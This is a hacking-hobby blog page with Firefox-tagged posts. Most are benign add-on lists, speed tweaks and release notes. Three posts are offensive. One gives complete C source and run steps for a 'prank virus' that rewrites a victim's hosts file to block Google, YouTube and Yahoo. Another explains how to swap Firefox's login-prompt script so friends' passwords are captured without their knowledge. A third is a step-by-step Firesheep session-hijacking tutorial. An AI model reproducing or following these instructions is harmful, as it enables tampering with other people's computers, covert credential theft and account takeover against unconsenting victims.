Showing posts with label Firefox. Show all posts
Showing posts with label Firefox. Show all posts

SOME IMPORTANT FIREFOX ADDONS FOR DEVELOPMENT & SECURITY .



Well, according to the latest survey firefox is the second most used browser in the world. chrome is definitely catching up. And to be very frank , its the browser of my choice:D (
Now the question arises, why firefox?
you may choose firefox because it is fast, safe and open-source, which means you can modify  anything for it( if you know how).It is multi platform and the most important is its pluggable extension feature, it means that firefox gives you certain number of features and if you want to make it more you can make extensions.
about firefox security
While no browser is 100% secure Mozilla Firefox has much better security than Internet Explorer. Firefox does not support Activex which is a tool that can be used with good and bad intentions. Activex allows web sites to have more access to Windows. As a result of this, cyber criminals have taken advantage of it. This means that viruses and spy ware (and sometimes other types of malware as well such as adware) can take advantage of it, resulting in these programs ending up on the visitors computer (if using Windows at the time). Spyware is any piece of software that silently gathers information about a user while he/she navigates the Internet and transmits the information to an individual or company that uses it for marketing or other purposes.Spyware and other types of Malware usually do not target Firefox, but there is some out there that will also get Firefox, but it is rather unlikely that a Firefox user would get it. Unless for example they install loads of extensions from all kinds of web sites. So don't install an add-on if the website doesn't look trustworthy .If a Firefox user has the cache turned on a Trojan can end up in it. A cache is an amount of space in which Firefox uses to temporarily store images and other files from sites so you can load the page up quicker if you chose to go back and view the page again. You can turn it off by going to "Tools" then "options" click on the "advanced" tag and then the "cache" tag set the amount of MB's it's allowed to use to "0". However a Trojan just sit their in the catch and will not do anything unless the user actually opens it.
FIREFOX ADDONS
Add-ons are installable enhancements to the Mozilla Foundation's projects, and projects based on them. Add-ons allow the user to add or augment application features, use themes to their liking, and handle new types of content.So, Add-ons give Firefox many new options and functions. How to get them? www.google.com or mozillas extension site which is at addons.mozilla.org.some useful addons for development & security in my opinion are:
1. GREASE MONKEY:  This allows you to customize the way a web page displays or behaves, by using small bits of JavaScript.
download link:
https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/?src=cb-dl-users
2. FIRE BUG: Firebug integrates with Firefox to put a wealth of development tools at your fingertips while you browse. You can edit, debug, and monitor CSS, HTML, and JavaScript live in any web page.
download link:
https://addons.mozilla.org/en-US/firefox/addon/firebug
3.RIGHTTOCLICK: It enables right-click, text selection, context-menu, drag&drop and much more where it is disabled by Javascript.RightToClick protects from annoying alert pop-ups, can remove many timer actions and is able to suppress (unusual) click behavior. The highly sophisticated engine also offers options for fine tuning. Finally it's helpful with image downloads (also disabling CSS might be useful here).
download link:
https://addons.mozilla.org/en-us/firefox/addon/righttoclick
p.s- if you have not noticed yet, then let me inform you that you can use this addon in this blog also, try it.
4. NOSCRIPT:This add-on is used for security. It simply blocks malicious scripts, applets and flash. A disadvantage of this is if you want a script to be run on a site when visiting, you must unblock it. To read more about this addon:
http://teamhackaholic.blogspot.com/2011/06/noscript-security-against-active.html
5.ADD-N-EDIT COOKIES:No comment. You know what it does. but this add-on is not available for the 7.0,1 version.
6.ADBLOCK PLUS:The add-on is supported by over forty filter subscriptions in dozens of languages which automatically configure it for purposes ranging from removing online advertising to blocking all known malware domains. Adblock Plus also allows you to customize your filters with the assistance of a variety of useful features, including a context option for images, a block tab for Flash and Java objects, and a list of blockable items to remove scripts and stylesheets.
download link:
https://addons.mozilla.org/en-US/firefox/addon/adblock-plus
7.WEB-DEVELOPER:The Web Developer adds various web developer tools to your browser.
download link:
https://addons.mozilla.org/en-US/firefox/addon/web-developer
8.LIGHT SHOT: if you want a screenshot of a website immediately, then this tool is very useful for you.LightShot is a tool allowing you to easily make screenshots of any selected area in a browser tab.
downloading link:
https://addons.mozilla.org/en-US/firefox/addon/lightshot
9.HACKBAR: Well if you are a web develper and concerned about your website security, then this Add-on is made for you. we have already explained about this add-on in our blog earlier. follow the link to read more:http://teamhackaholic.blogspot.com/2011/06/firefox-hacking-addon-hackbar.html
10.ALL-IN-ONE SIDEBAR:This is made for the ease of the user.All-in-One Sidebar is a wonderful extension that provides you easy access to your bookmarks, downloads, history, themes and extensions, and more.
download link:
https://addons.mozilla.org/en-US/firefox/addon/all-in-one-sidebar
note: all the add-ons are explained keeping in mind that you are using the latest firefox version,i.e. 7.0.1, many security issues and bugs have been patched in this version. Otherwise if you are using the earlier versions of firefox, then many security related add-ons are available which are very important:
some of them are:XSS-ME, SQL INJECT ME etc.


posted by:-DR34MHAXX


posted under | 2 Comments

Prank your Friend : Block Websites on his PC Virus


Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.


This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-install’s the operating system. This blocking is not just confined to IE or Firefox. So once blocked, the site will not appear in any of the browser program.

Here is the Source Code of the virus : 


#include<stdio.h>
#include<dos.h>
#include<dir.h>

char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;

int find_root(void);
void block_site(void);

int find_root()
{
int done;
struct ffblk ffblk;//File block structure

done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

else return 0;
}

void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/

fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}

void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}



1. Paste the Above Given Source Code in Notepad & Save it as "Website_Block.c"
2. Compile the above created source file using a C Compiler.
3. Run the compiled module ie. the exe file obtained after compilation. It will block the sites that is listed in the source code.
4.Once you run the file Website_Block.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.

5. To remove the virus type the following in the Run Dialog Box. (Start -> Run)

%windir%\system32\drivers\etc
6.There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this

127.0.0.1                                google.com

7. Delete all such entries which contain the names of blocked sites.

Enjoy playing this Prank over your Friends & make them toil to use these Websites :D ;-)


Posted By :- |-|A|_F B|_00d Pr|nCe 


Prevent FaceBook From Tracking You !!!



A Few days back we had Talked about "Facebook track your cookies even after logout". Do you know how these social networking sites like Facebook, Google+, and Twitter tracks your visits to any web page that uses the familiar "Like", "Follow", or "+1" buttons, even if you do not actually click these buttons? 
I being a bit concerned about my privacy, have already installed privacy addons like Ghostery, Adblock Plus & hope a few of you might have done the same, but here’s a new addition to your privacy toolkit – Priv3.

Priv3 is different from addons like Ghostery. For example, Ghostery blocks social sharing buttons (+1, Like, Tweet buttons) and other social snippets (Facebook comments, Facebook connect) completely, so you may feel disconnected.

Priv3 maintains & protects your privacy by blocking trackers, but still shows social snippets like Facebook Comments, +1, like buttons so you don’t miss any content. Once you interact with the social snippet, it reloads the cookies and tracking starts again, so unless and until you interact with the snippet, the addon keeps blocking the trackers.

Now for Chrome user's its bit of an disappointment as Priv3 is only available for Firefox, so all they can do is wait for a Chrome version of it. If you’re a Firefox user, check it out and also tell us what you think of it.


Download The Priv3 Firefox Extension

posted under , | 0 Comments

How to get back to the old Facebook interface ???


Facebook made major changes to its user interface last month, and most of the users found it annoying. They are not just annoyed, but also confused on how the new features function. Users were pretty happy and adapted to the previous UI, which was user friendly and easy to use. However, the new changes to the UI has drawn confusions and put things upside down.
Along with the UI changes, came the real-time updates feature called Ticker. The Ticker basically updates every second with new comments, “likes” and tags made by friends. It is annoying because users don’t really want to know what exactly is happening over Facebook. For instance, Suppose I have 600+ friends on Facebook, and I’m not concerned about who my friend adds or whose comment he/she likes.
According to Facebook, “the Ticker, on the right-hand side of your account, lets you see all your friends’ activity in real-time. When you hover over an item on ticker, you can see the full story and join the conversation as it happens. Ticker updates itself as stories happen. This gives you a more complete picture of what your friends are doing, right now.”
Real-time updates work great with Twitter, but not with Facebook, and I think Facebook should probably stop “copying” features from other social networking sites. Although the new features are annoying, there are ways to revert back to the old Facebook UI, and disable the Ticker as well.
You might have come across blogs indicating the trick to get back the old Facebook UI by changing the preferred language to English (UK), and indeed the trick stopped working as Facebook fixed the issue. However, there is still a way to get back the old UI, and interestingly it works in a similar fashion by changing the preferred language.

How to you get back to the old  lovely Facebook interface & Get rid of this new one?
Change the preferred language to a foreign language other than English (US and UK). For instance, I have changed the language to German. If you’re a Google Chrome user, you will immediately be prompted to “translate” the page into English.
Before you click on the translate button, click on the “Options” button and select “Always translate German to English”. Now refresh or open Facebook in a new tab, and you will notice that every time you open Facebook, the page will be automatically translated to English. That way you will see the old Facebook interface and the Ticker disabled.


If you’re a Firefox user, try using the Facebook Translate add-on. However, I’ll definitely update this post if I find an alternate solution for Firefox users.


Mozilla Firefox 7 Released

 Firefox 7 final version has been released on September 27, 2011

The latest version of Firefox has the following changes:
  • Drastically improved memory handling for certain use cases
  • Added a new rendering backend to speed up Canvas operations on Windows systems
  • Bookmark and password changes now sync almost instantly when using Firefox Sync
  • The ‘http://’ URL prefix is now hidden by default
  • Added support for text-overflow: ellipsis
  • Added support for the Web Timing specification
  • Enhanced support for MathML
  • The WebSocket protocol has been updated from version 7 to version 8
  • Added an opt-in system for users to send performance data back to Mozilla to improve future versions of Firefox
  • Fixed several stability issues
  • Fixed several security issues 


Please see the complete list of changes in this version. Web and extension developers should also view the curated list of platform changes.

Download the latest version that’s right for you, and try to make internet a better place!

posted under | 0 Comments

JonDoFox 2.5.3 - Browser Optimized for Anonymous and Secure Web Surfing

JonDoFox 2.5.3 - Browser Optimized for anonymous and secure web surfing

The JonDoFox research team has uncovered a new attack on web browsers: Affected are the web browsers Firefox, Chrome and Safari. By a hidden call over of a URL with HTTP authentication data, third party sites could track a user over several web sites, even if the user blocks all cookies and other tracking procedures. JonDoFox now contains an integrated protection against this attack. Third party sites may now no longer receive HTTP authentication data from the browser. Moreover, the protection against cache and referer tracking has been enhanced. Furthermore, some detail enhancements were added, and JonDoFox is now fully compatible with the new Firefox 6. Users may therefore easily update to the new browser version. JonDoFox is both a profile and an extension for the popular Mozilla Firefox web browser. It protects the user's privacy while surfing the web by removing identifying information from the browser. As it is open source software and free to use, it is an ideal add-on for anonymization services like JonDonym and Tor, but may also be used without anonymization software, just for safer surfing.
Download JonDoFox
 
Source :- http://www.thehackernews.com/2011/08/jondofox-253-browser-optimized-for.html

Emulate Internet Explorer In Firefox ("IE Tab" Firefox addon)


Firefox users must have many times faced the problem where you need Internet Explorer to display the web pages. This problem occur mainly on education institute sites. Its a waste of time to start Internet Explorer every time the user comes across such webpages, some Firefox users may feel very uncomfortable using the unfamiliar Internet Explorer. This hardships and mental strain due to use of slow and weak Internet Explorer can be easily avoided using a popular Firefox addon IE Tab. Click on "read more" to know about the addon.

IE Tab


It is a very easy to use Firefox addon which can be used to emulate Internet Explorer in Firefox. Just right click on the website you want to open in IE and select the option "view page in IE". It opens a new tab in the Firefox and display the page as it would be displayed in Internet Explorer. There is another option "view page in Ext.App." which can be used to start the original IE on your PC and display the webpage in it. You can even set some websites to always open in the IE Tab, if you think they are displayed better in IE tab. It is also very useful for web developers to quickly check how their website will appear in Internet Explorer.
DOWNLOAD

Note:- It only work on Windows. Mac and Linux support is currently in development.

posted under | 0 Comments

FIREFOX HACKING ADDON ( HackBar )


This toolbar will help you in testing sql injections, XSS holes and site security. It is NOT a tool for executing standard exploits and it will NOT teach you how to hack a site. Its main purpose is to help a developer do security audits on his code. If you know what your doing, this toolbar will help you do it faster. If you want to learn to find security holes, you can also use this toolbar, but you will probably also need a book, a lot of Google and a brain :).Using this addon you wont have to open your notepad every time you need to compose scripts.

FEATURES
- Even the most complicated urls will be readable
- The focus will stay on the textarea, so after executing the url (Ctrl+Enter) you can just go on typing / testing
- The url in textarea is not affected by redirects.
- On the fly uu/url decoding.
- All functions work on the currently selected text.
- MD5/SHA1/SHA256 hashing
- MySQL/MS SQL Server/Oracle shortcuts
- XSS useful functions
- And lots more !!!

DOWNLOAD

posted under | 0 Comments

Generate TinyUrl Links with a right-click (Firefox Addons)

Most of you must be familiar with TinyUrl URL shortening service. If you don't "TinyUrl is a website which allows the user to shorten a long URL into a simple short URL in the form 'www.TinyUrl.com /some number & alphabet' when you use this link it just redirects you to the original link. This comes in real handy if you want to open the link on a mobile phone where it is impossible to type such lenghty URLs. It is also very useful when creating long lists of URLs. But sometimes it becomes boring and time wasting to go to the TinyUrl site every time you want to create a short URL. But don't worry there is a popular Firefox addon which can make this task as easy as right clicking the URL. Here is the addon,

TinyURL Generator

This is a very easy to use and popular Firefox addon using which you can create TinyUrl with just a right-click. Just right-click on the link or web-page whose URL you want to shorten and select "create TinyUrl for this page" or "create TinyUrl for this link" option, the TinyUrl will be automatically generated and copied to the clipboard, so you can paste the link where needed instantly.

DOWNLOAD Addon

posted under | 0 Comments

NoScript - Security against active conteefox Addon)nts (Fir

As the Internet is getting more popular, different types of security vulnerabilities are exploited everyday. One such security threat is presented by the active content on the web like javascript , flash, silverlight etc. The user may not even know, when he or she fell victim to it. Now there are many security measures you can take against it and one of the best is NoScript Firefox addon.

NoScript
NoScript is a very popular Firefox addon. It is one of the most recommended security addon on the net. What it basically does is stop any active content from executing in your browser without permission. You can choose the websites you trust and allow active contents from them to execute. Some of its important features are
  • It protects the user from harmful server-side active content and scripts.
  • It provides client-side protection against cross site scripting attack.
  • It protects the user from Clickjacking attacks.
  • It can force the browser to always use HTTPS.
DOWNLOAD

posted under | 0 Comments

FIRESHEEP TUTORIAL (Http Session Hijacking)

Firesheep a Firefox addon has recently become very popular for easily carrying out a HTTP session hijacking attack. Http session hijacking attack can't be considered as a very sophisticated attack but needs some technical knowlegde to be performed . But Firesheep makes the attack a child's play. Firesheep was developed by Eric butler for Firefox, it was released at Toorcon 12 to demonstrate how serious cookie stealing can be.
Now lets understand how Firesheep actually works. When you provide your username and password in login forms of different website and submit it, the browser first encrypts the password and then sends it over the network. The corresponding website compares the information against its internal database and if they match, it sends a cookie(a small text file) to your browser. The browser saves this cookie and uses it to authenticate the user on the website every time the user opens a different page of the website. When the user logs out of his account the browser just deletes the cookie. Now the problem is that this cookies are not encrypted before sending over the network, due to this a hacker can capture this cookies and using them authenticate himself as the user from whom the cookie was stolen.
Now lets see how to use Firesheep.


1) First download and install WinPcap (WinPcap in Windows is used for capturing network traffic.) You can use Pcap in libPcap library for unix like systems.
DOWNLOAD WinPcap

2) Download and open Firesheep in Firefox, it will automatically install it. Or just drag it and place it over Firefox shortcut (Firesheep at this instant is not supporting Firefox 4 ).
DOWNLOAD Firesheep

3) After it is installed a side bar will appear in the browser with a button "start capturing", press it and sit back. In few seconds you will see account details with photos of the target. Click on one of it and you will directly enter in his account. Simple as that.

Note:- Using Firesheep to hijack others account is illegal under wiretapping Act.

!!!! HAPPY HACKING !!!!

posted under | 0 Comments

Turn Firefox into a Stealer without Softwares

Ever wanted to hack your friends accounts, whenever they were over your house. Or you just wanted Firefox to save all your passwords without prompting you every single time. Then this tutorial is for you.

Follow the below mentioned steps :-

1. Locate nsLoginManagerPrompter.js file (Default location C:\Program Files\Mozilla Firefox\components).
2. Open the file with WordPad or Notepad!
3. Press Ctrl + A on keyboard, and then press del or delete!
4. Copy and Paste all the contents from the link below in the file :
http://tinypaste.com/6ddc00
5. Make sure Firefox is closed and save the file.

You are done :-) From now on, whenever someone logs onto any site, their username and password will be saved automatically without prompt :D

To retrieve the account information : Make sure firefox is opened, go to Tools < Options... < Security Tab << click on saved passwords, then click on show passwords, and Press YES :-)


!!! Hacking is not a Crime !!!

posted under | 0 Comments

12 Tricks To Increase Your Firefox Speed By A Noticeable Amount

Firefox is a well known open source browser and is widely used around the world for it being secure, stable and fast.

With this tutorial you will be able to explore the hidden speed of Firefox which will boost the speed of Firefox and make your Firefox much more faster

To speed up Firefox follow these steps :-

1. Type about:config in the address bar and then press Enter. And you will see a confirmation message. Now click I'll be careful, I promise!

2. You will see a label there Filter, just next to it type network.http.pipelining. Now be sure the value field is set true, if not double-click to set true.
Info: HTTP is the application-layer protocol that most web pages are transferred with. In HTTP 1.1, multiple requests can be sent before any responses are received. This is known as pipelining. Pipelining reduces page loading times, but not all servers support it!

3. Go back to the Filter search bar and type network.http.pipelining.maxrequests Double-click this option and set its value to 8.


4. In the Filter search bar and type network.http.proxy.pipelining Once opened double-click on it and set it to true.


5. Type network.dns.disableIPv6 in the filter search bar and set this option to true by double clicking on it.

Info: In IPv6-capable DNS servers, an IPv4 address may be returned when an IPv6 address is requested. It is possible for Mozilla to recover from this misinformation, but a significant delay is introduced.

6. CONTENT INTERRUPT PARSING
This preference controls if the application will interrupt parsing a page to respond to UI events. It does not exist by default.
Right-click (Apple users ctrl+click) anywhere in the about:config window, select New and then Boolean from the pop-up menu. Then:

A. Enter content.interrupt.parsing in the New boolean value pop-up window and click OK.

B. When prompted to choose the value for the new boolean, select true and click OK.


7. Rather than wait until a page has completely downloaded to display it to the user, Mozilla applications will regularly render what has been received to that point. This option controls the maximum amount of time the application will be unresponsive while rendering pages.

Right-click (Apple users ctrl+click) anywhere in the about:config window, select New and then Integer from the pop-up menu.

A. Enter content.max.tokenizing.time in the New integer value pop-up window and click OK.

B. You will be prompted to enter a value. Enter 2250000 and click OK.


8. CONTENT NOTIFY INTERVAL
This option sets the minimum amount of time to wait between reflows. Right-click (Apple users ctrl+click) anywhere in the about:config window, select New and then Integer from the pop-up menu.

A. Type content.notify.interval in the New integer value pop-up window and click OK.

B. You will be prompted to enter a value. Enter 750000 and click OK.


9. CONTENT NOTIFY ONTIMER

A. This option sets if to reflow pages at an interval any higher than that specified by content.notify.interval. Right-click (Apple users ctrl+click) anywhere in the about:config window and select New and then Boolean from the pop-up menu.

B. Type content.notify.ontimer in the New boolean value pop-up window and click OK.


C. You will be prompted to choose the value for the new boolean. Select true and click OK.


10. Notify Backoffcount
This option controls the maximum number of times the content will do timer-based reflows. After this number has been reached, the page will only reflow once it is finished downloading. Right-click (Apple users ctrl+click) anywhere in the about:config window and select New and then Integer from the pop-up menu.

A. Enter content.notify.backoffcount in the New integer value pop-up window and click OK.

B. You will be prompted to enter a value. Enter 5 and click OK.


11. CONTENT SWITCH THRESHOLD
You can interact with a loading page when content.interrupt.parsing is set to true. When a page is loading, the application has two modes: a high frequency interrupt mode and a low frequency interrupt mode. The first one interrupts the parser more frequently to allow for greater UI responsiveness during page load.

The low frequency interrupt mode interrupts the parser less frequently to allow for quicker page load. The application enters high frequency interrupt mode when you move the mouse or type on the keyboard and switch back to low frequency mode when you had no activity for a certain amount of time. This preference controls that amount of time. Right-click (Apple users ctrl+click) anywhere in the about:config window and select New and then Integer from the pop-up menu.

A. Enter content.switch.threshold in the New integer value pop-up window and click OK.

B. You will be prompted to enter a value. Enter 750000 and click OK.


12. NGLAYOUT INITIALPAINT DELAY
Mozilla applications render web pages incrementally, they display what??™s been received of a page before the entire page has been downloaded. Since the start of a web page normally doesn't have much useful information to display, Mozilla applications will wait a short interval before first rendering a page. This preference controls that interval. Right-click (Apple users ctrl+click) anywhere in the about:config window and select New and then Integer from the pop-up menu.

A. Enter nglayout.initialpaint.delay in the New integer value pop-up window and click OK.


B. You will be prompted to enter a value. Enter 0 and click OK.


That's it! Now restart Firefox and your browsing as well as downloading speed will be much more faster. Good luck.

posted under | 1 Comments

Firefox inside Firefox

Well you all must be using the Mozilla Firefox Browser.
This post contains a trick which let you open a firefox window inside another firefox window. Just paste the following text in the URL and hit enter & see d MAGIC.


chrome://browser/content/browser.xul

posted under | 0 Comments
Older Posts Home

Followers

    !!!! LeTs ChAt !!!!

    AddThis

    Share |

    Hack'a'Holic

    Subscribe to hackaholicteam

    Powered by in.groups.yahoo.com

    Blog Archive

    Powered by Blogger.